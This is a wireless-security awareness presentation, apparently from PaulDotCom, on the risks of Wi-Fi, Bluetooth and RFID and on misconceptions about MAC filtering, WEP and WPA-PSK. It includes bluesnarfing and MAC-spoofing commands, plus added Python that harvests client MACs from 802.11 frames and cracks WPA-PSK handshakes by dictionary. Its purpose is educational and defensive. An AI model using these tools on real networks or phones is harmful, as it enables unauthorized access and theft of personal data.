Wireless Network Security?
Author: Paul Asadoorian, GCIA, GCIH
Contributions by Larry Pesce, GCFA, GAWN
PaulDotCom http://pauldotcom.com
Many are aware that wireless networks, given their open nature, are not secure. Some may take precautions, such as running WEP, using a VPN, or using the newer WPA standards. This presentation aims to raise awareness about attacks that are not easily detectable or preventable on most wireless networks today.
This is not a "0day" presentation; there are no "new" attacks, merely demonstrations of existing attacks in different scenarios. In fact, the attacks presented in this paper come from research done as long as a year ago, with the newest "attack" having been presented in early 2006.
It is not the goal of this presentation to tell you not to use wireless networks, but to make you aware of the risks so you can make informed decisions about your usage of wireless technology and do everything possible to protect your organization's network infrastructure, data, and the integrity of its client computers.
• Why wireless security is increasingly important
• Wireless security misconceptions
• Wireless Attacks
- Detection & Prevention
• Defensive Wireless Computing
The roadmap for this presentation will first stress the importance of wireless security today: wireless technology is increasingly everywhere and in everything. We will then attempt to debunk some of the common wireless security misconceptions. To further stress the vulnerabilities in wireless networks, three attacks will be discussed and demonstrated, and ideas for detection and prevention presented. Finally we will turn our attention to practical ways in which to *try* to secure your wireless computing environment.
Warning: Wireless Network May Become Unstable
Just a warning. (We have permission to perform attacks against the wireless network and clients and will do so in a responsible manner.)
• New standards such as MIMO (802.11n) will allow for 108Mb
Linksys has popularized the wireless-networking-at-home experience by marketing cheap and easy-to-set-up wireless hardware. In today's market most laptop computers come with a wireless card built in, including Apple and Wintel. This makes it easy to set up wireless in the home: all you need is a $39 device, and whamo, you are now a Wifi household.
One of the drawbacks to wireless networks is speed; it is not as fast as plugging into the wire. However, new standards are looking to solve this problem by offering speeds comparable to wired Ethernet. What does this mean? In the home, there will be little incentive to run expensive cables, which means more people will migrate to wireless.
The Linksys WRT54G is the Swiss Army knife of Wifi: you can add battery packs and all sorts of other fun stuff (some of which you will see in this presentation). A battery pack lets you take your AP wherever you want to go.
Take Your AP With You!
We've estimated that you can get 3.5 hours with 8 AA batteries.
Resources:
http://www.ck3k.org/gal/wrt/ - "Linksys WRT54G Battery Power Guide"
Depicted here are wireless extensions for your TV (to get a wireless HD signal or display pictures on your TV) and your refrigerator, you know, so you don't miss your favorite show while cooking or grabbing a snack.
Wireless In Cell Phones
• Useful to drain battery
• Imagine 802.11n on a cell phone!
• Kind of a cool thing in a pinch
- Best Buy
- Emergency War Driving
Cell phones are now featuring wireless technology, allowing you to browse the web and check email wherever you can find a hotspot (we'll discuss hotspots a little later on). This technology is useful to drain your battery, and 802.11n isn't going to help things (in fact, I envision flames shooting out of the early models). It does come in handy:
- While standing in Best Buy one day I noticed that they had a bench of computers set up; most looked like customer computers being worked on by the crack team called "Geek Squad". I also noticed that they were plugged into WRT54G devices, which also means I smelled an open Wifi network. So while waiting, impatiently, I decided to conduct an experiment. I fired up the Wifi on my phone and saw the wireless networks "best buy" and "geek squad". I connected to the "geek squad" open SSID, and bam, I had an RFC1918 address. I didn't go any further, but you can use your imagination from here.
- Sometimes I get really bored on my drive home from work and I feel the need to do a war drive. I don't always have all my war-driving gear on board, so for a quick fix I enable Wifi on my cell. I am still entertained by some of the SSIDs that I find, such as one near my house labeled "redneckheaven" (insert dueling banjos music here).
Takes Cool Pictures Too
This page left intentionally "W00T"!
Wifi Everywhere: FON
• "Global hotspots" allow members to access open wireless networks
• Most do not provide encryption
• Three different access models:
The concern with FON, and other setups, is that they typically do little to secure the wireless network. This leaves you, and anyone connecting to you, vulnerable to attack.
FON also uses a modified Linksys WRT54G wireless router.
Wifi Everywhere: Open Hotspot
• WRT54G-based Wifi Hotspot distros:
- EWRT - http://www.portless.net/menu/ewrt/
- Chillispot - http://www.chillispot.org/ - Runs on OpenWRT
- WifiDog - http://www.wifidog.org/ - Also runs on OpenWRT
There are many other open source projects which implement "captive portal" technology to create an open wireless network. The above three also run on a WRT54G wireless router, with EWRT even having its own firmware that you install directly on the router. Chillispot and WifiDog run on OpenWRT (http://www.openwrt.org), which is a very popular open-source operating system designed specifically for the WRT54G platform.
The basic premise is that you run an open wireless network. Once a client connects to the network it gets an IP address from DHCP. When the user opens a web browser they are automatically taken to a login page no matter which web site they enter in the URL bar. This can be accomplished in a few different ways: the gateway can answer every DNS query from a client that has not logged in with the portal's own address (the "DNS cache poisoning" approach), or it can destination-NAT that client's HTTP connections to the portal until the login completes.
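The captive-portal mechanics described above, modelled as an added example (this is not code from the original presentation, nor from EWRT, Chillispot or WifiDog). A DHCP lease is handed out before any authentication; until the client's MAC has been authorized, its DNS queries all resolve to the portal and its port-80 connections are rewritten to the portal, which answers every request with a 302 to the login page. The portal address, account table, resolver answers and client MACs are constructed for the example.

```python
"""Captive-portal gateway decision logic (added example, not the projects' code).

Models the two redirection mechanisms a WRT54G hotspot uses: DNS answers that
point unauthenticated clients at the portal, and DNAT of their HTTP traffic to
the portal. On a real OpenWRT box the DNAT half is an iptables nat/PREROUTING
rule for tcp/80, with per-client accept rules inserted ahead of it as each MAC
logs in; the addresses and accounts below are assumptions for this example.
"""

PORTAL_IP = "10.0.0.1"                 # assumed: the gateway's own address
PORTAL_URL = "http://10.0.0.1/login"   # assumed: the login page
ALWAYS_ALLOWED_PORTS = {53}            # DNS must get through or the redirect never fires


class CaptivePortal:
    def __init__(self):
        self.leases = {}         # client MAC -> IP handed out by DHCP
        self.authorized = set()  # client MACs that completed the login page
        self._next_host = 10

    def dhcp(self, mac: str) -> str:
        """Every client gets an RFC1918 lease before any authentication happens."""
        mac = mac.lower()
        if mac not in self.leases:
            self.leases[mac] = "10.0.0.%d" % self._next_host
            self._next_host += 1
        return self.leases[mac]

    def login(self, mac: str, username: str, password: str, accounts: dict) -> bool:
        """Portal login: on success the client's MAC is added to the allow list."""
        if accounts.get(username) == password:
            self.authorized.add(mac.lower())
            return True
        return False

    def dns(self, mac: str, name: str, upstream: dict) -> str:
        """DNS redirect: an unauthenticated client resolves *every* name to the portal."""
        if mac.lower() in self.authorized:
            return upstream.get(name, "0.0.0.0")
        return PORTAL_IP

    def route(self, mac: str, dst_ip: str, dst_port: int):
        """DNAT: rewrite unauthenticated tcp/80 to the portal, pass DNS, drop the rest.
        Returns the (ip, port) the packet is actually delivered to, or None if dropped."""
        if mac.lower() in self.authorized or dst_port in ALWAYS_ALLOWED_PORTS:
            return (dst_ip, dst_port)
        if dst_port == 80:
            return (PORTAL_IP, 80)
        return None

    def http(self, mac: str, host: str, path: str):
        """The portal's web server: a 302 to the login page whatever site was typed."""
        if mac.lower() in self.authorized:
            return (200, "http://%s%s" % (host, path))
        return (302, "%s?next=http://%s%s" % (PORTAL_URL, host, path))


def browse(portal: CaptivePortal, mac: str, host: str, path: str, upstream: dict):
    """What the client ends up seeing for a typed URL: DHCP -> DNS -> routing -> HTTP."""
    portal.dhcp(mac)
    ip = portal.dns(mac, host, upstream)
    dst = portal.route(mac, ip, 80)
    if dst is None:
        return (None, "dropped")
    if dst[0] == PORTAL_IP:                 # redirected by DNS or DNAT: the portal answers
        return portal.http(mac, host, path)
    return (200, "http://%s%s" % (host, path))  # authorized: reaches the real site


UPSTREAM = {"www.example.com": "192.0.2.10"}   # constructed resolver answers
ACCOUNTS = {"guest": "hotspot"}                 # constructed portal accounts

if __name__ == "__main__":
    gw = CaptivePortal()
    client = "00:16:cb:11:22:33"
    print("before login:", browse(gw, client, "www.example.com", "/", UPSTREAM))
    gw.login(client, "guest", "hotspot", ACCOUNTS)
    print("after login: ", browse(gw, client, "www.example.com", "/", UPSTREAM))
```

Note what the allow list is keyed on: the client's MAC. Once a paying client has logged in, anyone who observed that MAC on the air and sets it on their own card is indistinguishable to this gateway, which is the same weakness the MAC-filtering slides below describe.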
Add Gigantic Antennas!
Wireless for the whole neighborhood
There are many different antenna hacks for the WRT54G; for more information on building antennas see:
http://www.wifi-toys.com/wi-fi.php?a=about&f=toc - Many sample chapters from the "Wifi Toys" book on this site. Includes excellent information on how to build your own cables and antennas.
It threatens your ISP's business model
• Sharing your Internet connection cuts into ISP profits (they hate it when that happens)
• Cox, a local ISP, recently notified all customers about the dangers of open WiFi:
"Our installers enable these built-in security features (like SSID and WEP encryption)"
- Read more at http://cox.com/takecharge/wi_fi.asp
We've all done it at one point or another: connected to someone else's wireless network to use the Internet (sometimes not even on purpose!). So why purchase your own Internet connection when you can just use someone else's? ISPs obviously have a huge problem with this, and some, as seen above, put forth marketing campaigns that are aimed at people's security fears. In reality, they are trying to save their business.
If they truly cared about security they would not offer "SSID" and "WEP" as potential security measures: the SSID is sent in the clear whenever a client associates, and WEP can be broken with the freely available tools shown later in this presentation.
• Build your own antenna to increase wireless range
• Requires tools, mechanical skills
• Chili & Pringles cans are most popular
- Who wants to eat an entire can of Chili anyway?
http://www.turnpoint.net/wireless/cantennahowto.html
Nobody is safe in my neighborhood
Antennas are fun, cheap, and easy to make. They can really boost signal so you can pick up your neighbor's Wifi from afar.
For the Anti-do-it-yourselfer
CompUSA brand 9 dBi Antenna for Linksys WRT54G - $50
12 dBi "Wireless Garden Super Cantenna Wireless Network Booster Antenna" - $50
9 dBi Directional Indoor Antenna - $30
You can buy RF antennas very cheaply now. It was almost a year ago that I started seeing high-gain antennas for sale at CompUSA; now the selection is quite vast. Just go to www.compusa.com and search for "antenna".
A 12 dBi antenna from CompUSA is now just $50.
From www.netgate.com, you can get a nice indoor/outdoor Yagi antenna for $30.
More Wireless Technologies
• That's just why WiFi needs to be secure
Taco Bell Takeover
"Taco Bell Takeover: After weeks of messing with the frequencies of a nearby Taco Bell, we decide to film ourselves messing with ourselves, just so we could witness the employees' reactions to the prank. RBCP and a neighbor of his drove to Taco Bell to place an order while RijilV and Is0tek stayed behind to mess with their order."
http://phonelosers.org/tv/tacobell/
As wireless becomes more popular, so do opportunities for hacking. In the above example a team of hackers hijacks a Taco Bell drive-through and injects audio into the drive-through radio system. There are many funny moments, such as when the manager comes out and scours the parking lot looking for the offenders, stating, "They have to be within 50 feet!"
• Bluetooth suffers from many insecurities as well
• Widely available on cell phones, mice, and
http://www.tomsnetworking.com/2005/03/08/how_to_bluesniper_pt1/
* Bluetooth wireless IDS was invented after developers grabbed a list of a CEO's contacts using Bluetooth hacking tools
For the not-so-mechanically inclined
• Bluetooth can go far despite popular belief
• They even make a Bluetooth dongle with an external antenna! ($40)
• Or go extreme!
- http://www.wardrivingworld.com
Bluetooth devices use the same spectrum (2.4GHz) as Wifi, and therefore all of the antennas and antenna-building techniques are similar. The cost of these devices is steadily dropping. CompUSA (in all its glory) offers a $40 USB dongle with an external antenna.
For more extreme Bluetooth goodness, you can go to www.wardrivingworld.com and pick up +12dBi antenna kits for around $140.
• Bluetooth relies on a PIN to provide security
- Typically the default is "0000"
- I think that was the combination to my luggage (I changed it from 1234)
• There are numerous tools and attacks that allow you to:
- Download address book
- Change address book
- Delete address book
- Make phone calls
- Listen to phone calls
Somehow, somewhere along the line, it was thought that a "pass key" of "0000" was some kind of security measure. Granted, it would be difficult to enter even an 8-character, upper/lower case, mixed letters-and-numbers password into a Bluetooth headset.
Bluesnarfing can be a dangerous attack. A particular person's cell phone call history or address book could be useful information, especially if it is the CEO's cell phone.
It's Easy!
• All you need is
- Laptop with CD-ROM
- A USB Bluetooth dongle
- Auditor boot CD
• Then go download the following tutorial:
- http://irongeek.com/i.php?page=videos/bluesnarf1
Attacking Bluetooth devices is quite easy. The above video tutorial is very good, and shows you all the commands you will need:
hciconfig hci0 - Similar to "ifconfig", but for Bluetooth adapters: shows the state of your local adapter hci0.
hcitool scan hci0 - Lists the discoverable Bluetooth devices in range, including their Bluetooth device addresses (the 48-bit, MAC-like address every command below needs).
rfcomm bind /dev/rfcomm0 00:0F:DE:CF:4D:D7 1 - Binds /dev/rfcomm0 to RFCOMM channel 1 on the remote device with that address.
rfcomm connect /dev/rfcomm0 00:0F:DE:CF:4D:D7 10 - Opens an RFCOMM connection from /dev/rfcomm0 to channel 10 on the remote device.
bluesnarfer -i -b <MAC> - Shows device information (make/model) for the phone at <MAC>.
bluesnarfer -r 1-100 -b <MAC> - Downloads phone book entries 1 through 100 from that phone.
The hciconfig tool is useful to see the state of your Bluetooth devices. hciconfig hci0 reset is useful too, as sometimes bluesnarfer or btscanner will leave your Bluetooth device in a "funky" state (no, not Rhode Island either).
To make bluesnarfer work with the default code:
1. Leave /etc/bluetooth/rfcomm.conf empty - bluesnarfer will do everything you need.
2. mkdir -p /dev/bluetooth/rfcomm
3. mknod -m 666 /dev/bluetooth/rfcomm/0 c 216 0
4. Run bluesnarfer.
5. Profit?
Fun With Bluesnarfing
Above you can see some of the bluesnarfing tools in action.
More fun Bluetooth tools
• btscanner - "Kismet-like" interface for scanning the air for Bluetooth devices
- Denotes which phones are vulnerable and what they are vulnerable to
• Car Whisperer - Allows you to inject and/or record audio on certain Bluetooth devices
- Headsets
- Bluetooth enabled cars
btscanner is a great tool that will look for all Bluetooth devices in range. You can often see all sorts of information about a device, such as make/model, the "name" string (which sometimes leaks even more information about the device, such as "Jeff's Phone"), and whether or not it is vulnerable to Bluetooth attacks. In that respect, it's almost like a Bluetooth vulnerability scanner.
Car Whisperer is an attack suite which allows you to scan for vulnerable Bluetooth devices and inject audio. It works because many headsets and car kits ship with a fixed PIN such as the "0000" mentioned on the previous slide, so the attacker can pair without the owner's involvement. Some cars have integrated Bluetooth, which could allow an attacker to inject audio into the car! This also works with some models of Bluetooth headsets. See the following links for more information:
http://trifinite.org/trifinite_stuff_carwhisperer.html
http://www.digitalmunition.com/HijackHeadSet.txt
Bluetooth Demo
"All your Bluetooth are belong to us"
Well, not really, but it sounds cool :)
More fun Bluetooth tools
• Redfang - Allows you to brute force the device address to find non-discoverable devices
• T-BEAR - The Transient Bluetooth Environment AuditoR allows for the same
• WRTSL54GS - Linksys WRT54G with a USB port
- http://forum.openwrt.org/viewtopic.php?id=1650 - Support for Bluetooth
- Fun possibilities
Redfang is an interesting tool. It tries to solve the address problem by brute forcing the 48-bit Bluetooth device address; in practice you narrow the search by giving it an address range, since the first three octets identify the manufacturer. Not the most efficient solution, but if you are patient this is an option. This tool will find devices that are not in discoverable mode.
T-BEAR is another Bluetooth hacking suite, similar to bluesnarfer and redfang.
The WRTSL54GS presents a potential platform for Bluetooth hacking because it provides a USB port. The BlueZ Bluetooth Linux drivers have been ported to OpenWRT, so look for good things to come.
• Radio Frequency IDentification
• Anyone who has ever bought clothing has experienced RFID
• Most operating in the 13.56MHz
passports, and even humans are using RFID as a method of identification
Below are some RFID resources:
RFID Reader Setup
Cloning attacks have been demonstrated at The Sixth HOPE hacker conference and Defcon 14. Passport RFID was cloned at the recent Defcon conference, and while the usefulness of the attack is under some debate, the ability to clone RFID has proven to be a security risk.
Sniffing RFID to gather sensitive data is another attack vector. Just as in wireless networks, data is transmitted for all to see.
DoS attacks are a nuisance in any environment, especially RFID.
Manipulation of data in transit could be used by an attacker for profitable gain at the cash register. New technology that puts RFID in your ATM card could be manipulated so that your $350 purchase looks like $3.50.
RFID Security Implications
• RFID is commonly used for physical security, such
lock clicks. We walk in and find Van Bokkelen waiting.
"See? I just broke into your office!" Westhues says gleefully. "It's so simple."
The above is a scenario where the ability to read and play back RFID can be used to gain physical access to a facility. Think of just how many RFID cards you could read in a busy coffee shop just outside a large corporation.
While most hackers prefer to stay behind the keyboard, this attack becomes scary as this technology becomes more prevalent and easy to use.
RFID Car Hacking
"Stealing" a car with RFID
This team of RFID hackers used their knowledge to clone the RFID chip in a car key. In order for this car to start you must send the correct signal over RFID in addition to having the key. Armed with a copy of the key and an RFID reader/transmitter they are able to start the car with the cloned key and RFID signal.
While you still need the key for this attack to be successful, it shows that the extra layer of defense did little to stop these attackers.
Cellular Internet
• EVDO, Cingular EDGE, etc.
• Hacks are certain to come; however, hardware is expensive
- Wifi was the same way
• The following shows debug commands executing "Engineering Mode" on the PC 5220:
- http://www.evdoinfo.com/Tips/PC_5220/Sniffing_Out_New_EVDO_Towers_with_a_PC5220_20050531297/
Given the insecurities in 802.11 wireless networks, many have chosen to go the cellular route. EVDO is one of the better technologies: it has good speeds, is well supported on all major platforms, and works reliably (due in large part to Verizon's coverage in many areas).
There are no widely known attacks against this technology, so you can feel pretty safe using it, even at a hacker conference like Shmoocon, HOPE, or Blackhat. There are some "hacks" for the cards; however, we are not aware of anyone being able to sniff packets or launch attacks against the protocol.
Wireless Security Is Increasingly Important
• Wifi is everywhere, hardware is cheaper
• Wifi is in everything, from cell phones to appliances; no shortage of devices to attack
• The popularity of Wifi hotspots is increasing; most do not implement good security
• Wifi can travel long distances
• Bluetooth is becoming more ubiquitous and is vulnerable to attack using readily available and cheap hardware
• RFID is everywhere, and people are working on hacking it
• EVDO is becoming more popular, and hackers are already taking an interest
Wireless Security Misconceptions
• "MAC address filtering keeps most people out"
• "WEP is better than nothing"
• "I use WPA-PSK now, so I'm secure"
• "VPNs will protect me"
• "Nobody will find my wireless network"
Above are what I believe to be the 5 most common wireless security misconceptions. Now, some wireless security is better than none, so don't feel as though you shouldn't use the above technologies. However, be aware of the risks and plan your wireless network security strategy accordingly, balancing risk with convenience. I hope to help you achieve a better balance by speaking about the risks.
"MAC address filtering keeps most people out"
• MAC addresses of the clients can be observed without associating to an AP
• Changing your own MAC address is easy
• Many utilities exist to do this
• A simple perl script makes it easy:
- http://www.michiganwireless.org/tools/sirmacsalot/
- http://aspoof.sourceforge.net/ (OS X tool)
- http://www.klcconsulting.net/smac/ (Windows tool)
Attacking a wireless network that uses MAC address filtering for security is pretty easy. MAC addresses of valid hosts can be observed on the network by anyone with a wireless sniffer in monitor mode, because the address fields in the 802.11 frame header are never encrypted, even on a WEP or WPA network. Utilities to aid in the process have even been developed.
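The observation step, as an added example that is not code from the original presentation, Kismet or Kismac: a monitor-mode sniffer hands you raw 802.11 frames, and the ToDS/FromDS bits in the frame control field tell you which address field holds the client and which holds the BSSID. The parser below harvests the set of client MACs seen talking to a chosen BSSID. The frames are constructed for the example (a real capture would first need its radiotap or Prism header stripped), and every MAC address in it is made up.

```python
"""Harvest client MAC addresses for a target BSSID from raw 802.11 frames.

Added example (not from the original presentation, Kismet or Kismac). Parses the
802.11 MAC header the way a monitor-mode sniffer sees it: frame control, then
three fixed 6-byte address fields whose meaning depends on the ToDS/FromDS bits.
The sample frames and MAC addresses below are constructed for the example.
"""
from collections import namedtuple

Header = namedtuple("Header", "ftype subtype to_ds from_ds addr1 addr2 addr3")


def mac_str(b: bytes) -> str:
    return ":".join("%02x" % x for x in b)


def parse_header(frame: bytes) -> Header:
    """Decode frame control and the first three address fields (fixed offsets)."""
    fc0, fc1 = frame[0], frame[1]
    return Header(
        ftype=(fc0 >> 2) & 0x3,        # 0 = management, 1 = control, 2 = data
        subtype=fc0 >> 4,
        to_ds=fc1 & 0x1,
        from_ds=(fc1 >> 1) & 0x1,
        addr1=mac_str(frame[4:10]),
        addr2=mac_str(frame[10:16]),
        addr3=mac_str(frame[16:22]),
    )


def is_unicast(mac: str) -> bool:
    """Group bit (LSB of the first octet) clear: a real station, not broadcast/multicast."""
    return int(mac.split(":")[0], 16) & 0x1 == 0


def station_of(h: Header):
    """For a data frame, return (bssid, station_mac) according to the DS bits."""
    if h.ftype != 2:
        return None
    if h.to_ds and not h.from_ds:
        return h.addr1, h.addr2      # station -> AP: Addr1 = BSSID, Addr2 = SA
    if h.from_ds and not h.to_ds:
        return h.addr2, h.addr1      # AP -> station: Addr2 = BSSID, Addr1 = DA
    if not h.to_ds and not h.from_ds:
        return h.addr3, h.addr2      # ad hoc / IBSS: Addr3 = BSSID, Addr2 = SA
    return None                      # WDS (both bits set) needs Addr4; skipped here


def stations_for(frames, bssid: str) -> set:
    """MAC-filter bypass step 1: the set of client MACs seen exchanging data with bssid."""
    seen = set()
    for frame in frames:
        if len(frame) < 24:
            continue                 # too short to carry three address fields
        found = station_of(parse_header(frame))
        if found and found[0] == bssid.lower() and is_unicast(found[1]):
            seen.add(found[1])
    return seen


def _frame(fc0, fc1, a1, a2, a3, payload=b""):
    """Build a minimal 802.11 frame: frame control, duration, Addr1-3, sequence control."""
    m = lambda s: bytes.fromhex(s.replace(":", ""))
    return bytes([fc0, fc1, 0, 0]) + m(a1) + m(a2) + m(a3) + b"\x10\x00" + payload


# Constructed capture: a beacon, two associated stations, a broadcast, another BSS.
AP = "00:14:bf:aa:bb:cc"
STA_A = "00:16:cb:11:22:33"
STA_B = "00:0f:de:44:55:66"
SAMPLE_FRAMES = [
    _frame(0x80, 0x00, "ff:ff:ff:ff:ff:ff", AP, AP),                    # beacon (mgmt, subtype 8)
    _frame(0x08, 0x01, AP, STA_A, "00:14:bf:00:00:01"),                 # data, ToDS: STA_A -> wired host
    _frame(0x08, 0x02, STA_B, AP, "00:14:bf:00:00:01"),                 # data, FromDS: wired host -> STA_B
    _frame(0x88, 0x02, "ff:ff:ff:ff:ff:ff", AP, AP),                    # QoS data to broadcast: ignored
    _frame(0x08, 0x01, "00:18:39:de:ad:00", "00:18:39:00:11:22", AP),   # other BSS: ignored
]

if __name__ == "__main__":
    for mac in sorted(stations_for(SAMPLE_FRAMES, AP)):
        print("allowed client:", mac)
```

Once you have the list, the rest of the attack is the spoofing step on the next slides: set one of those addresses on your own card, ideally after the real client has gone quiet, since two stations using the same MAC at once is noticeable to both the victim and a wireless IDS.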
"MAC address filtering keeps most people out"
• Kismac is a PPC OS X application that lets you sniff wireless networks in monitor mode. Kismet is the Linux alternative.
• No support for OS X on Intel for Kismac!
• This allows you to see the valid MAC addresses on the network
• Kismac/Kismet Demo
Even Works in OS X
• aspoof is a utility to change your MAC address in OS X
- http://aspoof.sourceforge.net/
• Kind of scary to run, but it works:
root#: kextunload /System/Library/Extensions/AppleAirPort2.kext/
root#: aspoof /System/Library/Extensions/AppleAirPort2.kext/Contents/MacOS/AppleAirPort2 /var/root/latest_working_file 00:11:22:33:44:55
root#: kextload /System/Library/Extensions/AppleAirPort2.kext/
Even OS X has ready-made utilities for changing one's MAC address. aspoof works by patching the AppleAirPort2 driver binary itself, which is why the kernel extension is unloaded first and reloaded afterwards so the patched driver takes effect.
"WEP is better than nothing"
• All software tools required are on a bootable Linux CD
• Whax and Auditor merged to create "Backtrack"
- Demo uses Auditor
• Then all you need is a laptop with a wireless card
Backtrack is now the official distribution of choice that has replaced Auditor and Whax, and can be downloaded from http://www.remote-exploit.org/index.php/BackTrack
The wireless card of choice for most attacks is the Senao 802.11b card from www.netgate.com
"I use WPA-PSK, so I'm secure now"
• WPA-PSK protected networks are vulnerable to dictionary attacks
- This now works with WPA & WPA2 (802.11i)
• New attack techniques have increased the speed
"I use WPA-PSK, so I'm secure now"
• Spoof the MAC address of the AP and tell the client to disassociate
• Sniff the wireless network for the WPA-PSK handshake (EAPOL)
• Run coWPAtty against the packets to crack the key
- Needs the SSID to crack the WPA-PSK, easily obtainable!
- Also supports WPA2-PSK cracking with the same precomputed tables!
The attack against WPA and WPA2 is a dictionary brute force against the passphrase. You first need to capture the four-way handshake. It does not contain the passphrase or a hash of it; what it carries are the two nonces and a MIC computed with a key derived from the passphrase, and that MIC is what each dictionary candidate is checked against, offline. In order to do this you need to be able to see the EAPOL handshake, which is accomplished by spoofing a disassociation packet to the client, from the access point. The client will then reconnect and the handshake can be captured. Then you use the coWPAtty tool to perform the dictionary attack. You will also need the SSID value, because the passphrase is hashed together with the SSID (4096 rounds of PBKDF2) to produce the key.
"I use WPA-PSK, so I'm secure now"
• The Church of Wifi released research to improve this process at Shmoocon 2006
- Presentation: http://shmoocon.org/2006/presentations/SHMOOCON.odp
- Video: http://shmoocon.org/2006/videos/ChurchOfWiFi.mp4
http://wigle.net/ and used a 170,000 word dictionary
- DEFCON 14 saw the release with 1 million word dictionary
keys/sec instead of just 12 keys/sec
Using rainbow tables the Church of Wifi was able to greatly increase the effectiveness of this attack. Because the SSID is the salt in the key derivation, a table is only good for one SSID, so they precomputed tables for a large list of common SSIDs in order to make the attack easier to run against random networks.
A presentation at Blackhat 2006 improved upon this further, using FPGAs to gain even more speed, which resulted in almost real-time WPA-PSK cracking. Unfortunately the FPGAs used at DEFCON 14 cost nearly $40K.
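The derivation behind the last two slides, as an added example (this is not code from the original presentation and not coWPAtty's source): PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds), PTK = PRF-512(PMK, "Pairwise key expansion", MACs and nonces), and the EAPOL-Key MIC over message 2 of the handshake, which is the oracle the dictionary attack checks each candidate against. It also shows why the SSID is needed and why the Church of Wifi's tables are per-SSID: change the SSID and the same wordlist fails. There is no packet capture here, so the handshake is constructed the way a client would build it; the AP and client MACs, nonces, SSID, passphrase and wordlist are all assumptions for the example.

```python
"""WPA/WPA2-PSK dictionary attack against a captured four-way handshake.

Added example (not from the original presentation, not coWPAtty). Implements
the 802.11i PSK derivation, the PTK PRF and the EAPOL-Key MIC check. The
"capture" below is constructed in-process; MACs, nonces and wordlist are assumptions.
"""
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """802.11i PSK mapping: 4096 rounds of PBKDF2-HMAC-SHA1 with the SSID as salt.
    This salt is why a precomputed (rainbow) table only works for one SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: concatenation of HMAC-SHA1(key, label | 0x00 | data | i)."""
    out = b""
    for i in range((nbytes + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:nbytes]


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max of the MACs and nonces).
    The first 16 bytes are the KCK, the key that authenticates the handshake."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 64)


def eapol_mic(kck: bytes, eapol_frame: bytes, keyver: int) -> bytes:
    """Key MIC over the whole EAPOL-Key frame with its MIC field zeroed.
    Descriptor version 1 (WPA/TKIP) uses HMAC-MD5, version 2 (WPA2/CCMP) HMAC-SHA1."""
    digest = hashlib.md5 if keyver == 1 else hashlib.sha1
    return hmac.new(kck, eapol_frame, digest).digest()[:16]


MIC_OFFSET = 81  # EAPOL header (4) + descriptor fields up to the 16-byte Key MIC field


def build_msg2(snonce: bytes, keyver: int) -> bytes:
    """Constructed EAPOL-Key message 2 (client -> AP) with an all-zero MIC field."""
    descriptor = b"\x02" if keyver == 2 else b"\xfe"          # RSN vs WPA descriptor type
    key_info = (0x0108 | keyver).to_bytes(2, "big")            # Pairwise | MIC | key version
    body = (descriptor + key_info + b"\x00\x00" + b"\x00" * 8  # key length, replay counter
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8  # key IV, RSC, key ID
            + b"\x00" * 16 + b"\x00\x00")                       # MIC (zeroed), key data length
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body   # 802.1X v1, type EAPOL-Key


def constructed_capture(passphrase, ssid, keyver, aa, spa, anonce, snonce) -> dict:
    """What the client would put on the air; stands in for a sniffed handshake."""
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    msg2 = build_msg2(snonce, keyver)
    mic = eapol_mic(kck, msg2, keyver)
    msg2 = msg2[:MIC_OFFSET] + mic + msg2[MIC_OFFSET + 16:]
    return {"ssid": ssid, "keyver": keyver, "aa": aa, "spa": spa,
            "anonce": anonce, "snonce": snonce, "eapol2": msg2}


def crack(capture: dict, wordlist):
    """Try each candidate passphrase; the MIC in message 2 decides. None if no hit."""
    frame = capture["eapol2"]
    captured_mic = frame[MIC_OFFSET:MIC_OFFSET + 16]
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    for word in wordlist:
        pmk = pmk_from_passphrase(word, capture["ssid"])          # the expensive step
        ptk = ptk_from_pmk(pmk, capture["aa"], capture["spa"],
                           capture["anonce"], capture["snonce"])
        if eapol_mic(ptk[:16], zeroed, capture["keyver"]) == captured_mic:
            return word
    return None


# Constructed sample: WPA2 (key version 2), weak passphrase present in a tiny wordlist.
AP_MAC = bytes.fromhex("00145c0a0b0c")
STA_MAC = bytes.fromhex("000fde4d4dd7")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
WORDLIST = ["password", "linksys", "letmein1", "redneckheaven"]
CAPTURE = constructed_capture("letmein1", "linksys", 2, AP_MAC, STA_MAC, ANONCE, SNONCE)

if __name__ == "__main__":
    print("recovered passphrase:", crack(CAPTURE, WORDLIST))
    print("same wordlist, wrong SSID:", crack(dict(CAPTURE, ssid="linksys2"), WORDLIST))
```

The loop's cost is entirely in pmk_from_passphrase: the 4096 PBKDF2 rounds are what limit a CPU to a handful of candidates per second, and they depend only on (passphrase, SSID), not on anything in the capture. That is exactly the work the Church of Wifi tables precompute once per SSID, and what the FPGA work parallelized; the PTK and MIC steps that remain per handshake are cheap.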